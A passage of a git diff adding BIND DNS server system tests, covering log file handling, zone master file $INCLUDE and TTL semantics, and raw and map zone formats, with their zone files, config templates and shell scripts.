ns1/named.conf + rndc_reconfig ns1 10.53.0.1 > rndc.out.test$n + wait_for_log 5 "reloading configuration succeeded" ns1/named.run || ret=1 + if [ "$ret" -ne 0 ]; then echo_i "failed"; fi + status=$((status+ret)) +else + echo_i "skipping symlink test (unable to create symlink)" +fi + +echo_i "repeat previous tests without named -g" +copy_setports ns1/named.plain.in ns1/named.conf +$PERL ../stop.pl --use-rndc --port ${CONTROLPORT} logfileconfig ns1 +cp named1.args ns1/named.args +start_server --noclean --restart --port ${PORT} ns1 + +n=$((n+1)) +echo_i "testing log file validity (only plain files allowed) ($n)" +ret=0 +cat /dev/null > ns1/named_log +copy_setports ns1/named.plainconf.in ns1/named.conf +nextpart ns1/named.run > /dev/null +rndc_reconfig ns1 10.53.0.1 > rndc.out.test$n +wait_for_log 5 "reloading configuration succeeded" ns1/named.run || ret=1 +if [ "$ret" -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +# Now try directory, expect failure +n=$((n+1)) +echo_i "testing directory as log file ($n)" +ret=0 +nextpart ns1/named.run > /dev/null +copy_setports ns1/named.dirconf.in ns1/named.conf +rndc_reconfig ns1 10.53.0.1 > rndc.out.test$n +wait_for_log 5 "reloading configuration failed: invalid file" ns1/named.run || ret=1 +if [ "$ret" -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +# Now try pipe file, expect failure +n=$((n+1)) +echo_i "testing pipe file as log file ($n)" +ret=0 +nextpart ns1/named.run > /dev/null +rm -f ns1/named_pipe +if mkfifo ns1/named_pipe >/dev/null 2>&1; then + copy_setports ns1/named.pipeconf.in ns1/named.conf + rndc_reconfig ns1 10.53.0.1 > rndc.out.test$n + wait_for_log 5 "reloading configuration failed: invalid file" ns1/named.run || ret=1 + if [ "$ret" -ne 0 ]; then echo_i "failed"; fi + status=$((status+ret)) +else + echo_i "skipping pipe test (unable to create pipe)" +fi + +# Now try symlink file to plain file, expect success +n=$((n+1)) +echo_i "testing symlink to plain file as log file ($n)" +ret=0 +rm -f ns1/named_log ns1/named_sym +touch ns1/named_log +if ln -s $(pwd)/ns1/named_log $(pwd)/ns1/named_sym >/dev/null 2>&1; then + nextpart ns1/named.run > /dev/null + copy_setports ns1/named.symconf.in ns1/named.conf + rndc_reconfig ns1 10.53.0.1 > rndc.out.test$n + wait_for_log 5 "reloading configuration succeeded" ns1/named.run || ret=1 + if [ "$ret" -ne 0 ]; then echo_i "failed"; fi + status=$((status+ret)) +else + echo_i "skipping symlink test (unable to create symlink)" +fi + +echo_i "testing logging functionality" +n=$((n+1)) +ret=0 +echo_i "testing iso8601 timestamp ($n)" +copy_setports ns1/named.iso8601.in ns1/named.conf +rndc_reconfig ns1 10.53.0.1 > rndc.out.test$n +grep '^....-..-..T..:..:..\.... ' ns1/named_iso8601 > /dev/null || ret=1 +if [ "$ret" -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "testing iso8601-utc timestamp ($n)" +ret=0 +copy_setports ns1/named.iso8601-utc.in ns1/named.conf +rndc_reconfig ns1 10.53.0.1 > rndc.out.test$n +grep '^....-..-..T..:..:..\....Z' ns1/named_iso8601_utc > /dev/null || ret=1 +if [ "$ret" -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "testing explicit versions ($n)" +ret=0 +copy_setports ns1/named.versconf.in ns1/named.conf +# a seconds since epoch version number +touch ns1/named_vers.1480039317 +rndc_reconfig ns1 10.53.0.1 > rndc.out.test$n +$DIG version.bind txt ch @10.53.0.1 -p ${PORT} > dig.out.test$n +grep "status: NOERROR" dig.out.test$n > /dev/null || ret=1 +# we are configured to retain five logfiles (a current file +# and 4 backups). so files with version number 5 or higher +# should be removed. +test_with_retry -f ns1/named_vers.1480039317 && ret=1 +test_with_retry -f ns1/named_vers.5 && ret=1 +test_with_retry -f ns1/named_vers.4 || ret=1 +if [ "$ret" -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "testing timestamped versions ($n)" +ret=0 +copy_setports ns1/named.tsconf.in ns1/named.conf +# a seconds since epoch version number +touch ns1/named_ts.1480039317 +# a timestamp version number +touch ns1/named_ts.20150101120000120 +rndc_reconfig ns1 10.53.0.1 > rndc.out.test$n +_found2() ( + $DIG version.bind txt ch @10.53.0.1 -p ${PORT} > dig.out.test$n + grep "status: NOERROR" dig.out.test$n > /dev/null || ret=1 + + # we are configured to keep three versions, so the oldest + # timestamped versions should be gone, and there should + # be two or three backup ones. + [ -f ns1/named_ts.1480039317 ] && return 1 + [ -f ns1/named_ts.20150101120000120 ] && return 1 + set -- ns1/named_ts.* + [ "$#" -eq 2 -o "$#" -eq 3 ] || return 1 +) +retry_quiet 5 _found2 || ret=1 +if [ "$ret" -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "testing unlimited versions ($n)" +ret=0 +copy_setports ns1/named.unlimited.in ns1/named.conf +# a seconds since epoch version number +touch ns1/named_unlimited.1480039317 +rndc_reconfig ns1 10.53.0.1 > rndc.out.test$n +$DIG version.bind txt ch @10.53.0.1 -p ${PORT} > dig.out.test$n +grep "status: NOERROR" dig.out.test$n > /dev/null || ret=1 +test_with_retry -f ns1/named_unlimited.1480039317 || ret=1 +test_with_retry -f ns1/named_unlimited.4 || ret=1 +if [ "$ret" -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "testing default logfile using named -L file ($n)" +ret=0 +$PERL ../stop.pl logfileconfig ns1 +cp named2.args ns1/named.args +test -f ns1/named.pid && ret=1 +rm -f ns1/named_deflog +copy_setports ns1/named.plainconf.in ns1/named.conf +start_server --noclean --restart --port ${PORT} ns1 +[ -f "ns1/named_deflog" ] || ret=1 +if [ "$ret" -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +echo_i "exit status: $status" +[ $status -eq 0 ] || exit 1 diff --git a/bin/tests/system/masterfile/clean.sh b/bin/tests/system/masterfile/clean.sh new file mode 100644 index 0000000..97aa377 --- /dev/null +++ b/bin/tests/system/masterfile/clean.sh @@ -0,0 +1,20 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +rm -f dig.out.* +rm -f */named.memstats +rm -f */named.conf +rm -f */named.run +rm -f ns*/named.lock +rm -f checkzone.out* +rm -f ns*/managed-keys.bind* diff --git a/bin/tests/system/masterfile/knowngood.dig.out b/bin/tests/system/masterfile/knowngood.dig.out new file mode 100644 index 0000000..d4cbac8 --- /dev/null +++ b/bin/tests/system/masterfile/knowngood.dig.out @@ -0,0 +1,32 @@ +include. 300 IN SOA ns.include. hostmaster.include. 1 3600 1800 1814400 3600 +include. 300 IN NS ns.include. +a.include. 300 IN A 10.0.0.1 +a.include. 300 IN A 10.0.0.99 +a.a.include. 300 IN A 10.0.1.1 +b.foo.a.include. 300 IN A 10.0.2.2 +b.include. 300 IN A 10.0.0.2 +a.b.include. 300 IN A 10.0.1.1 +c.b.include. 300 IN A 10.0.0.3 +b.foo.b.include. 300 IN A 10.0.2.2 +ns.include. 300 IN A 127.0.0.1 +include. 300 IN SOA ns.include. hostmaster.include. 1 3600 1800 1814400 3600 +ttl2. 1 IN SOA ns.ttl2. hostmaster.ttl2. 1 3600 1800 1814400 3 +ttl2. 1 IN NS ns.ttl2. +a.ttl2. 1 IN TXT "inherited ttl 1" +b.ttl2. 2 IN TXT "explicit ttl 2" +c.ttl2. 2 IN TXT "inherited ttl 2" +d.ttl2. 3 IN TXT "default ttl 3" +e.ttl2. 2 IN TXT "explicit ttl 2" +f.ttl2. 3 IN TXT "default ttl 3" +ns.ttl2. 1 IN A 10.53.0.1 +ttl2. 1 IN SOA ns.ttl2. hostmaster.ttl2. 1 3600 1800 1814400 3 +ttl2. 1 IN SOA ns.ttl2. hostmaster.ttl2. 1 3600 1800 1814400 3 +ttl2. 1 IN NS ns.ttl2. +a.ttl2. 1 IN TXT "inherited ttl 1" +b.ttl2. 2 IN TXT "explicit ttl 2" +c.ttl2. 2 IN TXT "inherited ttl 2" +d.ttl2. 3 IN TXT "default ttl 3" +e.ttl2. 2 IN TXT "explicit ttl 2" +f.ttl2. 3 IN TXT "default ttl 3" +ns.ttl2. 1 IN A 10.53.0.1 +ttl2. 1 IN SOA ns.ttl2. hostmaster.ttl2. 1 3600 1800 1814400 3 diff --git a/bin/tests/system/masterfile/ns1/include.db b/bin/tests/system/masterfile/ns1/include.db new file mode 100644 index 0000000..149c819 --- /dev/null +++ b/bin/tests/system/masterfile/ns1/include.db @@ -0,0 +1,35 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +; Test $INCLUDE current domain name and origin semantics + +$TTL 300 +@ IN SOA ns hostmaster ( + 1 ; serial + 3600 + 1800 + 1814400 + 3600 + ) + NS ns + +ns A 127.0.0.1 + +a A 10.0.0.1 +$INCLUDE sub.db a +; use the current domain name + A 10.0.0.99 +b A 10.0.0.2 +$ORIGIN b +$INCLUDE sub.db +; use the current domain name +; A 10.0.0.99 +c A 10.0.0.3 diff --git a/bin/tests/system/masterfile/ns1/named.conf.in b/bin/tests/system/masterfile/ns1/named.conf.in new file mode 100644 index 0000000..5ab72a5 --- /dev/null +++ b/bin/tests/system/masterfile/ns1/named.conf.in @@ -0,0 +1,39 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.1; + notify-source 10.53.0.1; + transfer-source 10.53.0.1; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.1; }; + listen-on-v6 { none; }; + recursion no; + notify yes; +}; + +zone "include" { + type primary; + file "include.db"; +}; + +zone "ttl1" { + type primary; + file "ttl1.db"; +}; + +zone "ttl2" { + type primary; + file "ttl2.db"; +}; diff --git a/bin/tests/system/masterfile/ns1/sub.db b/bin/tests/system/masterfile/ns1/sub.db new file mode 100644 index 0000000..7e027b0 --- /dev/null +++ b/bin/tests/system/masterfile/ns1/sub.db @@ -0,0 +1,15 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +a A 10.0.1.1 +$ORIGIN foo +b A 10.0.2.2 + diff --git a/bin/tests/system/masterfile/ns1/ttl1.db b/bin/tests/system/masterfile/ns1/ttl1.db new file mode 100644 index 0000000..56afe9d --- /dev/null +++ b/bin/tests/system/masterfile/ns1/ttl1.db @@ -0,0 +1,27 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +@ IN SOA ns hostmaster ( + 1 ; serial + 3600 + 1800 + 1814400 + 3 + ) + NS ns +ns A 10.53.0.1 +a TXT "soa minttl 3" +b 2 TXT "explicit ttl 2" +c TXT "soa minttl 3" +$TTL 1 +d TXT "default ttl 1" +e 4 TXT "explicit ttl 4" +f TXT "default ttl 1" diff --git a/bin/tests/system/masterfile/ns1/ttl2.db b/bin/tests/system/masterfile/ns1/ttl2.db new file mode 100644 index 0000000..778e8d3 --- /dev/null +++ b/bin/tests/system/masterfile/ns1/ttl2.db @@ -0,0 +1,30 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +@ 1 IN SOA ns hostmaster ( + 1 ; serial + 3600 + 1800 + 1814400 + 3 + ) + NS ns +ns A 10.53.0.1 +a TXT "inherited ttl 1" +b 2 TXT "explicit ttl 2" +c TXT "inherited ttl 2" +$TTL 3 +d TXT "default ttl 3" +e 2 TXT "explicit ttl 2" +f TXT "default ttl 3" + + + diff --git a/bin/tests/system/masterfile/ns2/example.db b/bin/tests/system/masterfile/ns2/example.db new file mode 100644 index 0000000..414403a --- /dev/null +++ b/bin/tests/system/masterfile/ns2/example.db @@ -0,0 +1,21 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA mname1. . ( + 2010042407 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns2 +ns2 A 10.53.0.2 diff --git a/bin/tests/system/masterfile/ns2/named.conf.in b/bin/tests/system/masterfile/ns2/named.conf.in new file mode 100644 index 0000000..1f4ef91 --- /dev/null +++ b/bin/tests/system/masterfile/ns2/named.conf.in @@ -0,0 +1,42 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +// NS2 + +options { + query-source address 10.53.0.2; + notify-source 10.53.0.2; + transfer-source 10.53.0.2; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.2; }; + listen-on-v6 { none; }; + recursion no; + notify yes; + dnssec-validation yes; +}; + +zone "." { + type hint; + file "../../common/root.hint"; +}; + +zone "example" { + type primary; + file "example.db"; +}; + +zone "missing" { + type primary; + file "missing.db"; +}; diff --git a/bin/tests/system/masterfile/setup.sh b/bin/tests/system/masterfile/setup.sh new file mode 100644 index 0000000..65fdd58 --- /dev/null +++ b/bin/tests/system/masterfile/setup.sh @@ -0,0 +1,19 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +$SHELL clean.sh +copy_setports ns1/named.conf.in ns1/named.conf +copy_setports ns2/named.conf.in ns2/named.conf diff --git a/bin/tests/system/masterfile/tests.sh b/bin/tests/system/masterfile/tests.sh new file mode 100644 index 0000000..1948a69 --- /dev/null +++ b/bin/tests/system/masterfile/tests.sh @@ -0,0 +1,62 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +DIGOPTS="-p ${PORT}" + +status=0 +n=0 + +ret=0 +n=`expr $n + 1` +echo_i "test master file \$INCLUDE semantics ($n)" +$DIG $DIGOPTS +nostats +nocmd include. axfr @10.53.0.1 >dig.out.$n + +echo_i "test master file BIND 8 compatibility TTL and \$TTL semantics ($n)" +$DIG $DIGOPTS +nostats +nocmd ttl2. axfr @10.53.0.1 >>dig.out.$n + +echo_i "test of master file RFC1035 TTL and \$TTL semantics ($n)" +$DIG $DIGOPTS +nostats +nocmd ttl2. axfr @10.53.0.1 >>dig.out.$n + +$DIFF dig.out.$n knowngood.dig.out || status=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +ret=0 +n=`expr $n + 1` +echo_i "test that the nameserver is running with a missing master file ($n)" +$DIG $DIGOPTS +tcp +noall +answer example soa @10.53.0.2 > dig.out.$n +grep SOA dig.out.$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +ret=0 +n=`expr $n + 1` +echo_i "test that the nameserver returns SERVFAIL for a missing master file ($n)" +$DIG $DIGOPTS +tcp +all missing soa @10.53.0.2 > dig.out.$n +grep "status: SERVFAIL" dig.out.$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +ret=0 +n=`expr $n + 1` +echo_i "test owner inheritance after "'$INCLUDE'" ($n)" +$CHECKZONE -Dq example zone/inheritownerafterinclude.db > checkzone.out$n +$DIFF checkzone.out$n zone/inheritownerafterinclude.good || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "exit status: $status" +[ $status -eq 0 ] || exit 1 diff --git a/bin/tests/system/masterfile/zone/inheritownerafterinclude.db b/bin/tests/system/masterfile/zone/inheritownerafterinclude.db new file mode 100644 index 0000000..11b97ea --- /dev/null +++ b/bin/tests/system/masterfile/zone/inheritownerafterinclude.db @@ -0,0 +1,14 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +@ 0 IN SOA . . 0 0 0 0 0 +$INCLUDE zone/nameservers.db + IN TXT "this should be at the zone apex" diff --git a/bin/tests/system/masterfile/zone/inheritownerafterinclude.good b/bin/tests/system/masterfile/zone/inheritownerafterinclude.good new file mode 100644 index 0000000..3877ed5 --- /dev/null +++ b/bin/tests/system/masterfile/zone/inheritownerafterinclude.good @@ -0,0 +1,3 @@ +example. 0 IN SOA . . 0 0 0 0 0 +example. 0 IN NS . +example. 0 IN TXT "this should be at the zone apex" diff --git a/bin/tests/system/masterfile/zone/nameservers.db b/bin/tests/system/masterfile/zone/nameservers.db new file mode 100644 index 0000000..f7b6525 --- /dev/null +++ b/bin/tests/system/masterfile/zone/nameservers.db @@ -0,0 +1,12 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +@ IN NS . diff --git a/bin/tests/system/masterformat/clean.sh b/bin/tests/system/masterformat/clean.sh new file mode 100755 index 0000000..c53c7ab --- /dev/null +++ b/bin/tests/system/masterformat/clean.sh @@ -0,0 +1,35 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +rm -f ./ns1/example.db.raw* +rm -f ./ns1/example.db.compat +rm -f ./ns1/example.db.serial.raw +rm -f ./ns1/large.db ./ns1/large.db.raw +rm -f ./ns1/example.db.map ./ns1/signed.db.map +rm -f ./ns1/session.key +rm -f ./dig.out.* +rm -f ./dig.out +rm -f ./*/named.memstats +rm -f ./*/named.conf +rm -f ./*/named.run +rm -f ./ns2/example.db +rm -f ./ns2/transfer.db.* +rm -f ./ns2/formerly-text.db +rm -f ./ns2/db-* +rm -f ./ns2/large.bk +rm -f ./ns3/example.db.map ./ns3/dynamic.db.map +rm -f ./baseline.txt ./text.* ./raw.* ./map.* ./badmap +rm -f ./ns1/Ksigned.* ./ns1/dsset-signed. ./ns1/signed.db.signed +rm -f ./rndc.out +rm -f ./ns*/named.lock +rm -f ./ns*/managed-keys.bind* diff --git a/bin/tests/system/masterformat/ns1/compile.sh b/bin/tests/system/masterformat/ns1/compile.sh new file mode 100755 index 0000000..6626c17 --- /dev/null +++ b/bin/tests/system/masterformat/ns1/compile.sh @@ -0,0 +1,36 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +# shellcheck source=conf.sh +. "$SYSTEMTESTTOP/conf.sh" + +$CHECKZONE -D -F raw -o example.db.raw example \ + example.db > /dev/null 2>&1 +$CHECKZONE -D -F map -o ../ns3/example.db.map example \ + example.db > /dev/null 2>&1 +$CHECKZONE -D -F map -o ../ns3/dynamic.db.map dynamic \ + example.db > /dev/null 2>&1 +$CHECKZONE -D -F raw=1 -o example.db.raw1 example-explicit \ + example.db > /dev/null 2>&1 +$CHECKZONE -D -F raw=0 -o example.db.compat example-compat \ + example.db > /dev/null 2>&1 +$CHECKZONE -D -F raw -L 3333 -o example.db.serial.raw example \ + example.db > /dev/null 2>&1 +$CHECKZONE -D -F raw -o large.db.raw large large.db > /dev/null 2>&1 +$CHECKZONE -D -F map -o example.db.map example-map \ + example.db > /dev/null 2>&1 + +$KEYGEN -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" -f KSK signed > /dev/null 2>&1 +$KEYGEN -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" signed > /dev/null 2>&1 +$SIGNER -S -f signed.db.signed -o signed signed.db > /dev/null +$CHECKZONE -D -F map -o signed.db.map signed signed.db.signed > /dev/null 2>&1 diff --git a/bin/tests/system/masterformat/ns1/example.db b/bin/tests/system/masterformat/ns1/example.db new file mode 100644 index 0000000..5ca0ae2 --- /dev/null +++ b/bin/tests/system/masterformat/ns1/example.db @@ -0,0 +1,58 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 1D + +@ IN SOA ns hostmaster ( + 1 + 3600 + 1800 + 1814400 + 3 + ) + NS ns +ns A 10.53.0.1 +mx MX 10 mail +a A 10.53.0.1 + A 10.53.0.2 +aaaa AAAA 2001:db8::53 +cname CNAME cname-target +dname DNAME dname-target +txt TXT "this is text" + +;; +;; we are not testing DNSSEC behavior, so we don't care about the semantics +;; of the following records. +dnskey 300 DNSKEY 256 3 13 ( + TEcpWeW1mJp+OujqyInMbjGRODJIYen/4kMR + wO6zW3RzrvmNIMgFag6G uXofiSwJ6YDeQ0O + 3uhPJsJ7ivpbh+w== + ) +private-dnskey 300 DNSKEY 256 3 253 ( AAo= ) +ds 300 DS 30795 1 1 ( + 310D27F4D82C1FC2400704EA9939FE6E1CEA + A3B9 ) +cdnskey 300 CDNSKEY 256 3 13 ( + TEcpWeW1mJp+OujqyInMbjGRODJIYen/4kMR + wO6zW3RzrvmNIMgFag6G uXofiSwJ6YDeQ0O + 3uhPJsJ7ivpbh+w== + ) +private-cdnskey 300 CDNSKEY 256 3 253 ( AAo= ) +cds 300 CDS 30795 1 1 ( + 310D27F4D82C1FC2400704EA9939FE6E1CEA + A3B9 ) +nsec 600 NSEC nsecnext NS DS RRSIG NSEC +rrsig 300 RRSIG SOA 1 0 300 20050714214747 ( + 20050614214747 30795 . + yi/RRPAQmn6rnjDQaCqVValBa+ICF00ZldKf + ZSDaoew5mMUh83DlrrPPNeAxrzMSNzDGlJ6P + fdyIFgzPn/CvthF4kjBUAiJTp4r2zhlaUJQ+ + QFo+drYXYgVJo6aA36fj ) diff --git a/bin/tests/system/masterformat/ns1/large.db.in b/bin/tests/system/masterformat/ns1/large.db.in new file mode 100644 index 0000000..5a81863 --- /dev/null +++ b/bin/tests/system/masterformat/ns1/large.db.in @@ -0,0 +1,22 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 1D + +@ IN SOA ns hostmaster ( + 1 + 3600 + 1800 + 1814400 + 3 + ) + NS ns +ns A 10.53.0.1 diff --git a/bin/tests/system/masterformat/ns1/named.conf.in b/bin/tests/system/masterformat/ns1/named.conf.in new file mode 100644 index 0000000..cc95655 --- /dev/null +++ b/bin/tests/system/masterformat/ns1/named.conf.in @@ -0,0 +1,87 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +// NS1 + +options { + pid-file "named.pid"; + listen-on port @PORT@ { 10.53.0.1; }; + port @PORT@; + listen-on-v6 { none; }; + recursion no; + notify no; + session-keyfile "session.key"; + servfail-ttl 0; +}; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.1 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +zone "example" { + type primary; + masterfile-format raw; + file "example.db.raw"; +}; + +zone "compat-example" { + type primary; + masterfile-format raw; + file "example.db.compat"; +}; + +zone "transfer1" { + type primary; + file "example.db"; + allow-transfer { any; }; +}; + +zone "transfer2" { + type primary; + file "example.db"; + allow-transfer { any; }; +}; + +zone "transfer3" { + type primary; + file "example.db"; + allow-transfer { any; }; +}; + +zone "transfer4" { + type primary; + file "example.db"; + allow-transfer { any; }; +}; + + +zone "large" { + type primary; + file "large.db.raw"; + masterfile-format raw; + allow-transfer { any; }; +}; + +zone "signed" { + type primary; + file "signed.db.map"; + masterfile-format map; + allow-transfer { any; }; + update-policy local; + auto-dnssec maintain; +}; diff --git a/bin/tests/system/masterformat/ns1/signed.db b/bin/tests/system/masterformat/ns1/signed.db new file mode 100644 index 0000000..55d6fae --- /dev/null +++ b/bin/tests/system/masterformat/ns1/signed.db @@ -0,0 +1,29 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 1D + +@ IN SOA ns hostmaster ( + 1 + 3600 + 1800 + 1814400 + 3 + ) + NS ns +ns A 10.53.0.1 +mx MX 10 mail +a A 10.53.0.1 + A 10.53.0.2 +aaaa AAAA 2001:db8::53 +cname CNAME cname-target +dname DNAME dname-target +txt TXT "this is text" diff --git a/bin/tests/system/masterformat/ns2/formerly-text.db.in b/bin/tests/system/masterformat/ns2/formerly-text.db.in new file mode 100644 index 0000000..02ce216 --- /dev/null +++ b/bin/tests/system/masterformat/ns2/formerly-text.db.in @@ -0,0 +1,48 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$ORIGIN . +$TTL 86400 ; 1 day +transfer3 IN SOA ns.transfer3. hostmaster.transfer3. ( + 1 ; serial + 3600 ; refresh (1 hour) + 1800 ; retry (30 minutes) + 1814400 ; expire (3 weeks) + 3 ; minimum (3 seconds) + ) + NS ns.transfer3. +$ORIGIN transfer3. +a A 10.53.0.1 + A 10.53.0.2 +aaaa AAAA 2001:db8::53 +cname CNAME cname-target +dname DNAME dname-target +$TTL 300 ; 5 minutes +dnskey DNSKEY 256 3 13 ( + 